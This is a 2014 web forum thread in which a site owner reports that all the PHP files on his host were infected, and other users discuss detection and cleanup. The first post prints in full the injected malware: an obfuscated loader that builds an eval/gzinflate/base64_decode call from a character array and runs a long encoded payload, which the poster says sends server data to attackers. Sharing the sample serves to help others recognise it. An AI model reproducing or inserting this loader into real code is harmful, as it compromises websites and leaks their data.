1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Mallware Alert

Discussion in 'Security' started by AlbCoder, Feb 9, 2014.

  1. #1
    I am unlucky because all the php files in my public_html are infected with the following code:
    <?php
    $md5 = "59f063d5d1a6b701de0b7628b708f1dd";
    $a5 = array("v",";","t",'n',"e",'6',"(",'b','i','c','$','_',"r",'d','l','g',"f",")","o","4","a",'z',"s");
    $b50 = create_function('$'.'v',$a5[4].$a5[0].$a5[20].$a5[14].$a5[6].$a5[15].$a5[21].$a5[8].$a5[3].$a5[16].$a5[14].$a5[20].$a5[2].$a5[4].$a5[6].$a5[7].$a5[20].$a5[22].$a5[4].$a5[5].$a5[19].$a5[11].$a5[13].$a5[4].$a5[9].$a5[18].$a5[13].$a5[4].$a5[6].$a5[10].$a5[0].$a5[17].$a5[17].$a5[17].$a5[1]);
    $b50('DZXFDeQIAkXDmW7VwUwazcHM7DJdVmZmdvRbIXx8xZn0f6q3Gcs+2Ys/abIVOPq/vMimvPjzDxcHEHc8Mt3pQPyh/Gaj+T2fmle/53GT0agkcIMIe2xvnufVc2B3ThOKuWPOgW2016x0ACfuLaccR+kRbkbCIGWdTC1qcd1yEs8ncVWEPH02lAgfM7gZtW2yaQbCNBDb/FDK9KDwGkhHrYF2ubsvJ6pl7FrgL+hLYLCiQkXVImTMtHciuB7tVu8zn9qhui5hZFzVOwVkY3H6ySuZwIO9a41IuGUzK/vzlOM4RAurfwnbQdYJDCUks51x40FNr61LxyjzxWCjuY/YdAN4DfmJUK8BgeW5H1jR7zWdnKLnOv1SYwfRhGsQpCt89g333nOZnARvZVi0U+yACbFZSifsCtDIQlzGho6B/KT7l6xPSYYUKxdcSohLHowfd8YcaDehTtYXGVDhQEHCTk34VVzRp0OvcPEm82rNTYgGeSWVtCbp5eq1V+IaW8gqXQ2+Iyo2kEhO3X1ybead/OGlL4821x6swkw314m8MHe5wnuygqP78/58lXljKTVcZOJjySEF5db25sQ3rk5PUcvaip0IXxYkJbIYjFiE8EhLGg38vPWzChgvmafyjDEmMAmxz8TIh+7UXpdFiUpysXiPnZtDWrXsZpQu0Ho9y5FKa2zt1FZ3GaKCvR6JzKLP1GXvCJYxoBjaafcu1AC2hfR994Fyda17qbY47qeatASJ18eNMLonogdC8cwkFvCaxJMBgrLAenLKn0R+ptCWfR0SXbJOnOieXshtGHUbvaV5pz7e6YzdL6UjO2tHHNqycmLXr4sXh0WniWo5Y2htT9PTm5gvHRUUIUwtoZtB855+Hp4GWIkMpPgeBC9G4Dpejo1qfNGmZThJlfbkuV3FKjH23hb2Yy+cPs09n5RCxg2+yJaxiI16/zQihLbXIe0MKTU373mdnCNqKJbW7RgA1qXVcHx1ztaSLQg9O07fcvq0N7F8NxUrWytfnshlJEIVTxQu3Pgh0EDkA0aoGStakohr3aOiK3A/h9t0QEZWa26cnCSnuRyrkTeSSMIQCdlnb54fun3jZFezqGb7oP1Q8HYY7p/Pb/3dEmgWy6Kj8A1al8TygMGK4iKRhD8/8k8CWaUt7V3pPb0rnjF7SOHd7QaerzAedUpU/DPiy/q6b0h1FQGrI1koKalOyk0MxoTRaxb2ts0m9ugNbXluc9x1ajpV3huiJRPOgkh5MmOpEoksrU80UjT56lr3JvcPiuC8kUXp0MOcqyAPVqy8beO8LMpAp2EhBFmHISEmG3JcmX5ge9JzTW+/e+g4MxyGM4UjWVWWqIYNx9CE+92dZrw9wC9Azl8hFZ7HWrwUgV92Ej/c4vbz5FidnKhpZ8gNvPPBvvOQ7HuU10J907lQ7a8NC3tBBUELemyIwvH6jDCzSWomEeLtwVjIHY3kHK2UV08kZommrq+vM1zp9pkeXT0YLSmKTGWv5VuKjrzl5FWoUw7glemruWB5mte5+Ahays2HWK+sSk2fqAMzNz5Sgq8wBLctV+dNkk3MzlaiNsNbfxQ5vBb8MwfDY67BtfW5zvQOGKJOmN5WfGJyzcJwklU2o67A9TYBXm4Gen/Ai69FWIG5mL3N/nekTa/M35VeYHRvEA7WOIiPndd79pH6eZvfsTtcknd0qgOdE2nsz4P/AKHfsY4HIyb6b6UCJ3O6ZvzMUNz/ysloKOn1eGG69VqcPsshUORXYEqAokDrGgjfkApg2VC54XNdHfrQc3+5vYUsgHD3DwsrW7xvGmagkQ88MDAM3Rjm1Gj5FUCPXih83dJHsnRU3uOCgSbPV2oO6OAA5h29DaK+9gTWeTYLVEOLAe7cmUYkPeveHVXqowxfRKjwv8en+IapWbus1TAfLhy8YtllAv3OxidFFWb+7GHxlSJ70l4QqZb60CCIiuB6eAhgV+69rzLGIh5qVGnkJiOSKe7VJNP0ojgIAm3NmrDu6mZ9zCKx769KO8UUAPNrZtQAYCQu8iXTq9Kw9J6nPMhKCChdF1InvqQOfsZamazkB88IhqHAQvCu40TXdenb9gFU45mH7D2FQke/5rrlU78Iw+dtysCiVsmGOIMLb22QzhBaxmyV6/rdQ8vn5EBAWZYWAgDAiSDA9d9///z9+/ff/wM=');
    ?>
    PHP:
    Now I found some articles about this code.
    http://stackoverflow.com/questions/7307970/cleanup-php-files-from-virus
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html


    EDIT:
    If You have mallware on your web hosting and want to remove it please contactme by writing a mail here

    Thanks
    SEMrush
     
    Last edited: Feb 9, 2014
    AlbCoder, Feb 9, 2014 IP
    Annea likes this.
    SEMrush
  2. Annea

    Annea Well-Known Member

    Messages:
    335
    Likes Received:
    44
    Best Answers:
    0
    Trophy Points:
    138
    #2
    How did you discover that you had the virus? Was your site acting up? I'm curious, so I know what to look for, how to tell if I have it.
     
    Annea, Feb 9, 2014 IP
  3. RobinInTexas

    RobinInTexas Active Member

    Messages:
    217
    Likes Received:
    14
    Best Answers:
    2
    Trophy Points:
    65
    #3
    I haven't had to remove any malware, yet :) but this plugin will look for it and it claims to remove the bad code from files where it finds it.
    Anti-Malware
     
    RobinInTexas, Feb 9, 2014 IP
  4. AlbCoder

    AlbCoder Well-Known Member

    Messages:
    126
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    163
    #4
    So I was making a new design a new theme wich is my and I saw the code in my theme wich is made by me.and than I got it.The code wich I gave sends information from my server to the hackers and enough.I liked the article on
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html
    All wordpress sites when are new this is the first plugin wich I install but nothing.Would be nice to delete the code with one command on ssh.Anyway the best solution is the article wich I said above on the php-beginners.com
     
    AlbCoder, Feb 9, 2014 IP
  5. AlbCoder

    AlbCoder Well-Known Member

    Messages:
    126
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    163
    #5
    Robin for curiosity I reused the plugin wich you said and please look the attached screenshot :)
    So the directory is full with that code but this plugin finds only 0 results
    If you open this article you will see the list of mallware iframes,javascripts and the same code like my but I think that this plugin doesnt have this virus in database
     

    Attached Files:

    AlbCoder, Feb 9, 2014 IP
  6. Annea

    Annea Well-Known Member

    Messages:
    335
    Likes Received:
    44
    Best Answers:
    0
    Trophy Points:
    138
    #6
    Thx for the info, AlbCoder!

    Re the plugin not finding the malicious code, is it because the hackers are able to make the code "invisible" to the plugin?
     
    Annea, Feb 9, 2014 IP
  7. RobinInTexas

    RobinInTexas Active Member

    Messages:
    217
    Likes Received:
    14
    Best Answers:
    2
    Trophy Points:
    65
    #7
    RobinInTexas, Feb 10, 2014 IP
  8. AlbCoder

    AlbCoder Well-Known Member

    Messages:
    126
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    163
    #8
    I cleaned up my host without the plugin.
     
    AlbCoder, Feb 10, 2014 IP